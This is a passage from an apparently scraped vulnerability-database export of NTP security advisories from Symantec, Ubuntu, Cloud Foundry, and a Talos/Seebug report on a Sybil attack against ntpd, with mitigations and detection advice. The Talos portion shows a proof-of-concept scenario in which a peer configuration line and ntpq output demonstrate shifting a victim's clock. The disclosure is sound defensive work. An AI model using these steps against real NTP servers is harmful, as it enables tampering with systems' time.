103194](<https://www.securityfocus.com/bid/103194>) / NVD: [CVE-2018-7170](<https://nvd.nist.gov/vuln/detail/CVE-2018-7170>) \n**Impact** | Unauthorized modification of system time \n**Description** | A Sybil vulnerability in ntpd allows remote authenticated NTP servers to establish a large number of ephemeral associations in order to influence the ntpd clock selection algorithm and modify the target's system time. \n \n \n\n**CVE-2018-7182** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 103191](<https://www.securityfocus.com/bid/103191>) / NVD: [CVE-2018-7182](<https://nvd.nist.gov/vuln/detail/CVE-2018-7182>) \n**Impact** | Denial of service \n**Description** | A buffer overread flaw in ntpd allows a remote attacker to send crafted mode 6 packets and cause denial of service through application crashes. \n \n \n\n**CVE-2018-7183** \n--- \n**Severity / CVSSv2** | High / 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n**References** | SecurityFocus: [BID 103351](<https://www.securityfocus.com/bid/103351>) / NVD: [CVE-2018-7183](<https://nvd.nist.gov/vuln/detail/CVE-2018-7183>) \n**Impact** | Denial of service \n**Description** | A buffer overflow flaw in ntpq allows a remote attacker to send a response with a crafted array and execute arbitrary code or cause denial of service. \n \n \n\n**CVE-2018-7184** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 103192](<https://www.securityfocus.com/bid/103192>) / NVD: [CVE-2018-7184](<https://nvd.nist.gov/vuln/detail/CVE-2018-7184>) \n**Impact** | Denial of service \n**Description** | A packet handling flaw in ntpd allows a remote attacker to send a packet with a zero-origin timestamp and reset the NTP association. This prevents ntpd from updating the system time until the NTP association resets, resulting in denial of service. \n \n \n\n**CVE-2018-7185** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 103339](<https://www.securityfocus.com/bid/103339>) / NVD: [CVE-2018-7185](<https://nvd.nist.gov/vuln/detail/CVE-2018-7185>) \n**Impact** | Denial of service \n**Description** | A packet handling flaw in ntpd allows a remote attacker to send a packet with a zero-origin timestamp and reset the NTP association. \n \n \n\n### MITIGATION\n\nAll CVEs except CVE-2018-7183 can be exploited only through the management network port for Director, MTD, MC, and SSLV. Allowing only machines, IP addresses and subnets from a trusted network to access to the management network port reduces the threat of exploiting the vulnerabilities.\n\nBy default, Director does not configure ntpd in symmetric on interleave mode. Customers who leave this behavior unchanged prevent attacks against Director using CVE-2018-7170, CVE-2018-7174, and CVE-2018-7185.\n\nBy default, all versions of Security Analytics do not configure ntpd in symmetric or interleave mode. Customers who leave this behavior unchanged prevent attacks against Security Analytics using CVE-2018-7170 and CVE-2018-7185. Also, Security Analytics 7.2 does not query remote NTP servers using ntpq. Customers who leave this behavior unchanged prevent attacks against Security Analytics 7.2 using CVE-2018-7183. \n \n\n\n### REFERENCES\n\nNTP Security Notice - <https://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S> \n \n\n\n### REVISION \n\n2021-01-15 WI 1.14 is vulnerable to CVE-2018-7170. A fix is not available at this time. Fixes will not be provided for WI 1.12. Please upgrade to a later release with the vulnerability fixes. \n2021-01-12 A fix for SSLV 3.10 and SSLV 3.12 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-11-18 A fix for MTD 1.1 will not be provided. Please upgrade to a version of CAS and SMG with the vulnerability fixes. A fix for SA 7.3 and 8.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. A fix for XOS 9.7, 10.0, and 11.0 will not be provided. A fix for Director 6.1 will not be provided. Please upgrade to a version of MC with the vulnerability fixes. A fix for Reporter 10.4 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-04-17 Content Analysis (CA) 2.4 and later versions are not vulnerable because a fix is available in 2.4.1.1. Reporter 10.5 is not vulnerable because a fix is available in 10.5.1.1. Fixes for Reporter 10.3 and SSLV 4.4 will not be provided. Please upgrade to later versions with the vulnerability fixes. Security Analytics 8.1 is vulnerable to CVE-2018-7170 and CVE-2018-7185. Advanced Secure Gateway (ASG) 7.1 and later are not vulnerable because a fix is available in 7.1.1.1. \n2019-10-07 WI 1.12 and 1.13 are vulnerable to CVE-2018-7170. A fix is not available at this time. \n2019-08-30 Reporter 10.4 has a vulnerable version of the NTP reference implementation, but is not vulnerable to known vectors of attack. \n2019-08-12 A fix for MC 2.0 will not be provided. Please update to a later version with the vulnerability fixes. \n2019-08-09 SSLV 4.5 is not vulnerable because a fix is available in 4.5.1.1. \n2019-08-07 A fix for ASG 6.6 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-06 A fix for Reporter 10.1 and 10.2 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-06 A fix for SSLV 4.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-02-27 A fix for CA 2.3 is available in 2.3.5.1. A fix for ASG 6.7 is available in 6.7.4.2. \n2019-02-04 A fix for CA 2.2 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-01-21 Security Analytics 8.0 is vulnerable to CVE-2018-7170 and CVE-2018-7185. \n2019-01-18 SSLV 4.3 and 4.4 are vulnerable to CVE-2018-7182. SSLV 5.0 is not vulnerable because a fix is available in 5.0.2.1. A fix for SSLV 4.2 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-01-14 MC 2.1 is not vulnerable because a fix is available in 2.1.1.1. A fix for MC 1.11 will not be provided. Please update to a later version with the vulnerability fixes. Reporter 10.3 has a vulnerable version of the NTP reference implementation, but is not vulnerable to known vectors of attack. \n2019-01-12 A fix for Security Analytics 7.1 will not be provided. Please update to a later version with the vulnerability fixes. \n2019-01-11 A fix for CA 2.1 will not be provided. Please update to a later version with the vulnerability fixes. \n2018-07-23 Director 6.1 is vulnerable to all CVEs. \n2018-04-26 initial public release\n", "modified": "2021-01-15T20:22:24", "published": "2018-04-26T08:00:00", "id": "SMNTC-1451", "href": "", "type": "symantec", "title": " SA165: NTP Vulnerabilities February 2018", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-16T14:35:01", "bulletinFamily": "software", "cvelist": ["CVE-2018-7185"], "description": "### Description\n\nNTP is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. NTP version 4.2.6 prior to 4.2.8p11 are vulnerable.\n\n### Technologies Affected\n\n * IBM AIX 5.3 \n * IBM AIX 6.1 \n * IBM AIX 7.1 \n * IBM Aix 7.2 \n * IBM Vios 2.2.0 \n * IBM Vios 2.2.0.10 \n * IBM Vios 2.2.0.11 \n * IBM Vios 2.2.0.12 \n * IBM Vios 2.2.0.13 \n * IBM Vios 2.2.1.0 \n * IBM Vios 2.2.1.1 \n * IBM Vios 2.2.1.3 \n * IBM Vios 2.2.1.4 \n * IBM Vios 2.2.2.0 \n * IBM Vios 2.2.2.4 \n * IBM Vios 2.2.2.5 \n * IBM Vios 2.2.2.6 \n * IBM Vios 2.2.3 \n * IBM Vios 2.2.3.0 \n * IBM Vios 2.2.3.2 \n * IBM Vios 2.2.3.3 \n * IBM Vios 2.2.3.4 \n * IBM Vios 2.2.3.50 \n * IBM Vios 2.2.4.0 \n * NTP NTP 4.2.6 \n * NTP NTP 4.2.7p11 \n * NTP NTP 4.2.7p111 \n * NTP NTP 4.2.7p22 \n * NTP NTP 4.2.7p366 \n * NTP NTP 4.2.7p385 \n * NTP NTP 4.2.8 \n * NTP NTP 4.2.8p1 \n * NTP NTP 4.2.8p10 \n * NTP NTP 4.2.8p2 \n * NTP NTP 4.2.8p3 \n * NTP NTP 4.2.8p4 \n * NTP NTP 4.2.8p5 \n * NTP NTP 4.2.8p6 \n * NTP NTP 4.2.8p7 \n * NTP NTP 4.2.8p8 \n * NTP NTP 4.2.8p9 \n * Oracle Fujitsu M10-1 Server XCP 2230 \n * Oracle Fujitsu M10-1 Server XCP 2271 \n * Oracle Fujitsu M10-1 Server XCP 2280 \n * Oracle Fujitsu M10-1 Server XCP 2290 \n * Oracle Fujitsu M10-1 Server XCP 2320 \n * Oracle Fujitsu M10-1 Server XCP 2360 \n * Oracle Fujitsu M10-1 Server XCP 3050 \n * Oracle Fujitsu M10-1 Server XCP 3052 \n * Oracle Fujitsu M10-1 Server XCP 3053 \n * Oracle Fujitsu M10-1 Server XCP 3060 \n * Oracle Fujitsu M10-4 Server XCP 2230 \n * Oracle Fujitsu M10-4 Server XCP 2271 \n * Oracle Fujitsu M10-4 Server XCP 2280 \n * Oracle Fujitsu M10-4 Server XCP 2290 \n * Oracle Fujitsu M10-4 Server XCP 2320 \n * Oracle Fujitsu M10-4 Server XCP 2360 \n * Oracle Fujitsu M10-4 Server XCP 3050 \n * Oracle Fujitsu M10-4 Server XCP 3052 \n * Oracle Fujitsu M10-4 Server XCP 3053 \n * Oracle Fujitsu M10-4 Server XCP 3060 \n * Oracle Fujitsu M10-4S Server XCP 2230 \n * Oracle Fujitsu M10-4S Server XCP 2271 \n * Oracle Fujitsu M10-4S Server XCP 2280 \n * Oracle Fujitsu M10-4S Server XCP 2290 \n * Oracle Fujitsu M10-4S Server XCP 2320 \n * Oracle Fujitsu M10-4S Server XCP 2360 \n * Oracle Fujitsu M10-4S Server XCP 3050 \n * Oracle Fujitsu M10-4S Server XCP 3052 \n * Oracle Fujitsu M10-4S Server XCP 3053 \n * Oracle Fujitsu M10-4S Server XCP 3060 \n * Oracle Fujitsu M12-1 Server XCP 2230 \n * Oracle Fujitsu M12-1 Server XCP 2290 \n * Oracle Fujitsu M12-1 Server XCP 2320 \n * Oracle Fujitsu M12-1 Server XCP 2360 \n * Oracle Fujitsu M12-1 Server XCP 3000 \n * Oracle Fujitsu M12-1 Server XCP 3050 \n * Oracle Fujitsu M12-1 Server XCP 3052 \n * Oracle Fujitsu M12-1 Server XCP 3053 \n * Oracle Fujitsu M12-1 Server XCP 3060 \n * Oracle Fujitsu M12-2 Server XCP 2230 \n * Oracle Fujitsu M12-2 Server XCP 2290 \n * Oracle Fujitsu M12-2 Server XCP 2320 \n * Oracle Fujitsu M12-2 Server XCP 2360 \n * Oracle Fujitsu M12-2 Server XCP 3000 \n * Oracle Fujitsu M12-2 Server XCP 3050 \n * Oracle Fujitsu M12-2 Server XCP 3052 \n * Oracle Fujitsu M12-2 Server XCP 3053 \n * Oracle Fujitsu M12-2 Server XCP 3060 \n * Oracle Fujitsu M12-2S Server XCP 2230 \n * Oracle Fujitsu M12-2S Server XCP 2290 \n * Oracle Fujitsu M12-2S Server XCP 2320 \n * Oracle Fujitsu M12-2S Server XCP 2360 \n * Oracle Fujitsu M12-2S Server XCP 3000 \n * Oracle Fujitsu M12-2S Server XCP 3050 \n * Oracle Fujitsu M12-2S Server XCP 3052 \n * Oracle Fujitsu M12-2S Server XCP 3053 \n * Oracle Fujitsu M12-2S Server XCP 3060 \n * Oracle Solaris 11.3 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nAttackers may successfully exploit client flaws in the browser through HTML-injection vulnerabilities. When possible, run all software as a user with minimal privileges and limited access to system resources. Use additional precautions such as restrictive environments to insulate software that may potentially handle malicious content. \n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to detect and block attacks and anomalous activity such as requests containing suspicious URI sequences. Since the webserver may log such requests, review its logs regularly. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-02-27T00:00:00", "published": "2018-02-27T00:00:00", "id": "SMNTC-103339", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/103339", "type": "symantec", "title": "NTP CVE-2018-7185 Denial of Service Vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:44:22", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7182"], "description": "Yihan Lian discovered that NTP incorrectly handled certain malformed mode 6 \npackets. A remote attacker could possibly use this issue to cause ntpd to \ncrash, resulting in a denial of service. This issue only affected Ubuntu \n17.10 and Ubuntu 18.04 LTS. (CVE-2018-7182)\n\nMichael Macnair discovered that NTP incorrectly handled certain responses. \nA remote attacker could possibly use this issue to execute arbitrary code. \n(CVE-2018-7183)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain \nzero-origin timestamps. A remote attacker could possibly use this issue to \ncause a denial of service. This issue only affected Ubuntu 17.10 and Ubuntu \n18.04 LTS. (CVE-2018-7184)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain \nzero-origin timestamps. A remote attacker could possibly use this issue to \ncause a denial of service. (CVE-2018-7185)", "edition": 5, "modified": "2018-07-09T00:00:00", "published": "2018-07-09T00:00:00", "id": "USN-3707-1", "href": "https://ubuntu.com/security/notices/USN-3707-1", "title": "NTP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-02T03:05:49", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8936", "CVE-2018-7182"], "description": "It was discovered that the fix for CVE-2018-7182 introduced a NULL pointer \ndereference into NTP. An attacker could use this vulnerability to cause a \ndenial of service (crash).", "edition": 1, "modified": "2020-10-01T00:00:00", "published": "2020-10-01T00:00:00", "id": "USN-4563-1", "href": "https://ubuntu.com/security/notices/USN-4563-1", "title": "NTP vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-07-02T11:38:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2018-7185", "CVE-2018-7183", "CVE-2016-7427", "CVE-2017-6462", "CVE-2017-6463", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426"], "description": "USN-3707-1 and USN-3349-1 fixed several vulnerabilities in NTP. This update \nprovides the corresponding update for Ubuntu 12.04 ESM.\n\nOriginal advisory details:\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain spoofed \naddresses when performing rate limiting. A remote attacker could possibly \nuse this issue to perform a denial of service. (CVE-2016-7426)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain crafted \nbroadcast mode packets. A remote attacker could possibly use this issue to \nperform a denial of service. (CVE-2016-7427, CVE-2016-7428)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain control \nmode packets. A remote attacker could use this issue to set or unset traps. \n(CVE-2016-9310)\n\nMatthew Van Gundy discovered that NTP incorrectly handled the trap service. \nA remote attacker could possibly use this issue to cause NTP to crash, resulting \nin a denial of service. (CVE-2016-9311)\n\nIt was discovered that the NTP legacy DPTS refclock driver incorrectly handled \nthe /dev/datum device. A local attacker could possibly use this issue to cause \na denial of service. (CVE-2017-6462)\n\nIt was discovered that NTP incorrectly handled certain invalid settings in a \n:config directive. A remote authenticated user could possibly use this issue \nto cause NTP to crash, resulting in a denial of service. (CVE-2017-6463)\n\nMichael Macnair discovered that NTP incorrectly handled certain responses. \nA remote attacker could possibly use this issue to execute arbitrary code. \n(CVE-2018-7183)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain \nzero-origin timestamps. A remote attacker could possibly use this issue to \ncause a denial of service. (CVE-2018-7185)", "edition": 4, "modified": "2019-01-23T00:00:00", "published": "2019-01-23T00:00:00", "id": "USN-3707-2", "href": "https://ubuntu.com/security/notices/USN-3707-2", "title": "NTP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:57", "bulletinFamily": "software", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7182"], "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nYihan Lian discovered that NTP incorrectly handled certain malformed mode 6 packets. A remote attacker could possibly use this issue to cause ntpd to crash, resulting in a denial of service. This issue only affected Ubuntu 17.10 and Ubuntu 18.04 LTS. (CVE-2018-7182)\n\nMichael Macnair discovered that NTP incorrectly handled certain responses. A remote attacker could possibly use this issue to execute arbitrary code. (CVE-2018-7183)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain zero-origin timestamps. A remote attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 17.10 and Ubuntu 18.04 LTS. (CVE-2018-7184)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain zero-origin timestamps. A remote attacker could possibly use this issue to cause a denial of service. (CVE-2018-7185)\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.224.0\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.224.0 or later.\n\n# References\n\n * [USN-3707-1](<https://usn.ubuntu.com/3707-1/>)\n * [CVE-2018-7182](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-7182>)\n * [CVE-2018-7183](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-7183>)\n * [CVE-2018-7184](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-7184>)\n * [CVE-2018-7185](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-7185>)\n", "edition": 5, "modified": "2018-07-19T00:00:00", "published": "2018-07-19T00:00:00", "id": "CFOUNDRY:395B2EFFF922C38DE193A0DDFFA06D6E", "href": "https://www.cloudfoundry.org/blog/usn-3707-1/", "title": "USN-3707-1: NTP vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T13:10:49", "description": "### SUMMARY\r\nntpd is vulnerable to Sybil attacks. A malicious authenticated peer can create arbitrarily-many ephemeral associations in order to win ntpd's clock selection algorithm and modify a victim's clock.\r\n\r\n### TESTED VERSIONS\r\nNTP 4.2.8p3 NTP 4.2.8p4 NTPsec 3e160db8dc248a0bcb053b56a80167dc742d2b74 NTPsec a5fb34b9cc89b92a8fef2f459004865c93bb7f92\r\n\r\n### PRODUCT URLS\r\nhttp://www.ntp.org http://www.ntpsec.org\r\n\r\n### CVSS SCORE\r\nCVSSv2: 3.5 - (AV:N/AC:M/Au:S/C:N/I:P/A:N) CVSSv3: 5.3 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N\r\n\r\n### DETAILS\r\nntpd has the ability to create ephemeral peer associations on the fly in response to certain kinds of incoming requests. In most common configurations, if an incoming request will cause a new ephemeral association to be mobilized, ntpd requires the request to be authenticated under a trusted symmetric key. However, ntpd does not enforce any limit on the number of active ephemeral associations that may be created under a single key making ntpd vulnerable to Sybil attacks.\r\n\r\nA malicious authenticated peer can use its knowledge of the trusted key that it shares with a victim ntpd process in order to create multiple ephemeral associations with the victim from different source IP addresses. Each of these malicious associations can advertise false time to the victim. If the malicious associations providing consistent false time advertisements outweigh the number of legitimate peer associations, the victim will sync to the time advertised by the attacker.\r\n\r\nRFC 5905 does not appear to mandate any specific behavior with regard to authenticating ephemeral associations. Therefore, we recommend that an incoming request only mobilize an ephemeral association if both of the following conditions hold:\r\n\r\n* There are no non-preemptible peer associations configured to use that key.\r\nThis prevents ephemeral associations from being created by configured, non-preemptible peers.\r\n* There are no preemptible peer associations authenticated under that key.\r\nThis prevents a malicious ephemeral peer from creating more than one peer association using a given key. If the IP address of an ephemeral peer changes, eventually the association will be demobilized at which time a new incoming request can cause a new association to be mobilized with a new IP address.\r\nAn alternative allowing faster failover: when an incoming request will mobilize a new ephemeral association, demobilize all preemptible peer associations authenticated under the key used to authenticate the incoming request before the new association is mobilized.\r\nThis vulnerability has been successfully exploited using symmetric ephemeral associations. However, ephemeral broadcast and manycast associations are also likely to be vulnerable.\r\n\r\nTo our knowledge, any ntpd instance configured using the 'trustedkey' directive is vulnerable, as in:\r\n```\r\nkeys /etc/ntp.keys\r\ntrustedkey 1 ...\r\n```\r\n\r\nThere does not appear to be any other configuration directives that would affect or mitigate this vulnerability. ntpd instances that are not configured with the 'trustedkey' directive are not vulnerable.\r\n\r\nThough this vulnerability has only been confirmed against specific releases of NTP and NTPsec, any release of ntp-3 or ntp-4 may be affected.\r\n\r\n### ATTACK SCENARIO\r\nTo illustrate this attack, a malicious authenticated ephemeral peer (attacker1) with knowledge of keyid 2 trusted by ntp-client-4.2.8p4 will create multiple malicious ephemeral peer associations with ntp-client-4.2.8p4, overwhelm the victim's legitimate time sources, and cause ntp-client-4.2.8p4 to modify its clock. We will illustrate this by querying ntp-client-4.2.8p4 for its active peer associations with:\r\n```\r\nntpq -c lpeer\r\n```\r\n\r\nInitially, ntp-client-4.2.8p4 is peered with one legitimate server (ntp-server).\r\n```\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\n*ntp-server .LOCL. 1 u 5 8 377 0.043 -0.051 0.414\r\n```\r\n\r\nAs a proof-of-concept, the attacker will attempt to move the victim's clock back by an amount just under the panic threshold, 15 minutes in this case. (Significantly larger steps have been achieved with some ntpd releases.) The attacker spins up three attacking nodes at different IP addresses (attacker1..3).\r\n\r\nAfter the attacking nodes are well synchronized, the attacker commences the attack by adding the following configuration line to each attacking node instructing it to peer with the victim using keyid 2:\r\n```\r\npeer ntp-client-4.2.8p4 key 2 noselect minpoll 3 maxpoll 3\r\n```\r\n\r\nAs a result, we see that ntp-client-4.2.8p4 now has 3 new malicious peers.\r\n```\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\n*ntp-server .LOCL. 1 u 3 8 377 0.130 0.479 0.399\r\n attacker1 .LOCL. 1 S 5 8 1 0.000 0.000 0.000\r\n attacker2 192.168.33.14 2 S 5 8 1 0.000 0.000 0.000\r\n attacker3 192.168.33.14 2 S 4 8 1 0.000 0.000 0.000\r\n```\r\n\r\nThe attackers consistently provide time advertisements that are about 15 minutes behind the time advertised by the legitimate ntp-server. Because the attackers outnumber legitimate peers, eventually the victim selects an attacker as its system peer indicating that it will synchronize its time to the attackers.\r\n```\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\nxntp-server .LOCL. 1 u 1 8 377 0.130 0.479 0.501\r\n*attacker1 .LOCL. 1 S 2 8 3 0.457 -931554 0.000\r\n+attacker2 192.168.33.14 2 S 2 8 3 0.644 -931553 0.000\r\n+attacker3 192.168.33.14 2 S 1 8 3 0.583 -931553 0.000\r\n```\r\n\r\nEventually, the victim steps its clock.\r\n```\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\n ntp-server .STEP. 16 u - 8 0 0.000 0.000 0.000\r\n attacker1 .STEP. 16 S 14 8 0 0.000 0.000 0.000\r\n attacker2 .STEP. 16 S 52 8 0 0.000 0.000 0.000\r\n attacker3 .STEP. 16 S 45 8 0 0.000 0.000 0.000\r\n```\r\n\r\nAfter stepping the clock, we see that the victim is 931 seconds behind ntp-server confirming the attack.\r\n```\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\n*ntp-server .LOCL. 1 u 2 8 1 0.379 931553. 0.317\r\n attacker1 .STEP. 16 S 19 8 0 0.000 0.000 0.000\r\n attacker2 .STEP. 16 S 57 8 0 0.000 0.000 0.000\r\n attacker3 .STEP. 16 S 50 8 0 0.000 0.000 0.000\r\n```\r\n\r\nWhile ntp-server is initially selected as the system peer after the clock step, the attacking nodes quickly regain their status as preferred time sources.\r\n```\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\nxntp-server .LOCL. 1 u 5 8 3 0.278 931552. 0.638\r\n*attacker1 .LOCL. 1 S 4 8 6 0.044 -0.346 0.049\r\n+attacker2 192.168.33.14 2 S 4 8 6 0.593 0.520 0.441\r\n+attacker3 192.168.33.14 2 S 3 8 6 0.758 0.020 0.074\r\n```\r\n\r\nAt this point, the attacker has control of the victim's clock and can continue to make modifications.\r\n\r\n### MITIGATION\r\nThe most complete mitigation is to upgrade to ntp-TBD or NTPsec TBD. If your system's ntpd is packaged by the system vendor, apply your vendor's security update as soon as it becomes available.\r\n\r\nAdministrators that are not using authenticated NTP can prevent exploitation by removing any unused 'trustedkey' configuration directives from their ntpd configuration file.\r\n\r\nIf your system supports a host-based firewall which blocks incoming traffic, such as the Windows Firewall, Mac OS X Application Firewall, or firewalls such as Uncomplicated Firewall or iptables on Linux, you should enable it.\r\n\r\nFor other systems, appropriate firewall rules will depend on your environment. Use the following recommendations as a guideline:\r\n* NTP clients should block incoming NTP packets from any IP address that is not a known, legitimate peer\r\n* NTP servers should block incoming symmetric active (NTP mode 1), server (NTP mode 4), and broadcast (NTP mode 5) packets from any IP address that is not a known, legitimate peer\r\n\r\n### DETECTION\r\nIn most common configurations, you can use ntpq to query the ntpd process running on your system for its list of peers. Any unexpected peers that are not configured in your ntp.conf file could indicate an attack. For example, if your system is configured to be a client of ntp-server and you expect one peer (known-peer), the appearance of additional peers (sybil) could indicate an attack:\r\n```\r\n$ ntpq -c lpeer\r\n\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\n*ntp-server .LOCL. 1 u 1 8 377 0.130 0.479 0.501\r\n known-peer .LOCL. 1 S 2 8 3 0.457 -931554 0.000\r\n sybil 192.168.33.14 2 S 2 8 3 0.644 -931553 0.000\r\n```\r\n\r\nYou can delete any rogue associations by restarting ntpd after applying the mitigations above.\r\nIf you have a compatible IDS product, the following Snort rules detect exploits of this vulnerability: TBD.\r\nAt the network level, multiple symmetric, broadcast, or manycast associations using the same keyid could indicate an attack.\r\n\r\n### TIMELINE\r\n2016-01-19 - CERT reports to NTP", "published": "2017-10-26T00:00:00", "type": "seebug", "title": "Network Time Protocol Ephemeral Association Time Spoofing Vulnerability(CVE-2016-1549)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1549"], "modified": "2017-10-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96788", "id": "SSV:96788", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "talos": [{"lastseen": "2020-07-01T21:25:37", "bulletinFamily": "info", "cvelist": ["CVE-2016-1549"], "description": "# Talos Vulnerability Report\n\n### TALOS-2016-0083\n\n## Network Time Protocol Ephemeral Association Time Spoofing Vulnerability\n\n##### April 26, 2016\n\n##### CVE Number\n\nCVE-2016-1549\n\n### SUMMARY\n\nntpd is vulnerable to Sybil attacks. A malicious authenticated peer can create arbitrarily-many ephemeral associations in order to win ntpd\u2019s clock selection algorithm and modify a victim\u2019s clock.\n\n### TESTED VERSIONS\n\nNTP 4.2.8p3 NTP 4.2.8p4 NTPsec 3e160db8dc248a0bcb053b56a80167dc742d2b74 NTPsec a5fb34b9cc89b92a8fef2f459004865c93bb7f92\n\n### PRODUCT URLS\n\nhttp://www.ntp.org http://www.ntpsec.org\n\n### CVSS SCORE\n\nCVSSv2: 3.5 - (AV:N/AC:M/Au:S/C:N/I:P/A:N) CVSSv3: 5.3 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N\n\n### DETAILS\n\nntpd has the ability to create ephemeral peer associations on the fly in response to certain kinds of incoming requests. In most common configurations, if an incoming request will cause a new ephemeral association to be mobilized, ntpd requires the request to be authenticated under a trusted symmetric key. However, ntpd does not enforce any limit on the number of active ephemeral associations that may be created under a single key making ntpd vulnerable to Sybil attacks.\n\nA malicious authenticated peer can use its knowledge of the trusted key that it shares with a victim ntpd process in order to create multiple ephemeral associations with the victim from different source IP addresses. Each of these malicious associations can advertise false time to the victim. If the malicious associations providing consistent false time advertisements outweigh the number of legitimate peer associations, the victim will sync to the time advertised by the attacker.\n\nRFC 5905 does not appear to mandate any specific behavior with regard to authenticating ephemeral associations. Therefore, we recommend that an incoming request only mobilize an ephemeral association if both of the following conditions hold:\n\n * There are no non-preemptible peer associations configured to use that key.\n\nThis prevents ephemeral associations from being created by configured, non-preemptible peers.\n\n * There are no preemptible peer associations authenticated under that key.\n\nThis prevents a malicious ephemeral peer from creating more than one peer association using a given key. If the IP address of an ephemeral peer changes, eventually the association will be demobilized at which time a new incoming request can cause a new association to be mobilized with a new IP address.\n\nAn alternative allowing faster failover: when an incoming request will mobilize a new ephemeral association, demobilize all preemptible peer associations authenticated under the key used to authenticate the incoming request before the new association is mobilized.\n\nThis vulnerability has been successfully exploited using symmetric ephemeral associations. However, ephemeral broadcast and manycast associations are also likely to be vulnerable.\n\nTo our knowledge, any ntpd instance configured using the \u2018trustedkey\u2019 directive is vulnerable, as in:\n \n \n keys /etc/ntp.keys\n trustedkey 1 ...\n \n\nThere does not appear to be any other configuration directives that would affect or mitigate this vulnerability. ntpd instances that are not configured with the \u2018trustedkey\u2019 directive are not vulnerable.\n\nThough this vulnerability has only been confirmed against specific releases of NTP and NTPsec, any release of ntp-3 or ntp-4 may be affected.\n\n### ATTACK SCENARIO\n\nTo illustrate this attack, a malicious authenticated ephemeral peer (attacker1) with knowledge of keyid 2 trusted by ntp-client-4.2.8p4 will create multiple malicious ephemeral peer associations with ntp-client-4.2.8p4, overwhelm the victim\u2019s legitimate time sources, and cause ntp-client-4.2.8p4 to modify its clock. We will illustrate this by 